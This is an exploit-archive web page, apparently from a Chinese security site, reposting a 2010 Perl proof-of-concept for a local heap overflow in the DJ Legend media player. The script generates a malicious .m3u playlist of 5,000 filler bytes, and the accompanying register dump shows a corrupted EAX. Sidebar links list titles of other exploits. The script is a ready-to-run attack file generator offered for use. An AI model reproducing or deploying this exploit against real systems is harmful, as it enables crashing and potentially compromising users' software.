首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DJ Legend local heap overflow proof of concept exploit that creates a malicious
来源:Wizard-skh@hotmail.com 作者:SkuLL-HacKeR 发布时间:2010-01-25  
#!/usr/bin/perl
# DJ Legend [.m3u / .pls File ] Local Heap Overflow Poc
# www.djlegend.net/<http://www.djlegend.net/>
# Found By : SkuLL-HacKeR
# Msn : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com>
########################################################################################
#EAX 45454545
#ESP 0012EF6C
#EBP 00DA50F8 ASCII "C:\Program Files\DJ Legend Trial\SkuLL-HacKeR.m3u"
#ESI 0012EFD8
#EDI 014143F8
#EBP 00000000
#ESI 02CD7102
#EIP 7C90EAF0 ntdll.KiFastSystemCallRet
use strict;
use warnings;
my $A= "\x45" x 5000;
open(my $ofl_playlist, "> SkuLL-HacKeR.M3u");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;

________________________________
Windows Live Messenger Windows Live Messenger, l'unico e l'originale. Diffida dalle imitazioni!<http://www.messenger.it>




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Invision Power Board remote fi
·IntelliTamper 2.07/2.08 (defer
·Windows Live Messenger 2009 Ac
·SOMPL Player Buffer Overflow
·IntelliTamper 2.07/2.08 (defer
·IntelliTamper 2.07/2.08 (SEH)
·EFS Easy Chat server Universal
·yPlay 1.0.76 (.mp3) Local Cras
·jetAudio 8.0.0.2 Basic Local C
·Pico MP3 Player 1.0 (.mp3 /.pl
·jetAudio 8.0.0.2 Basic (m3u) S
·Authentium SafeCentral <= 2.6
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved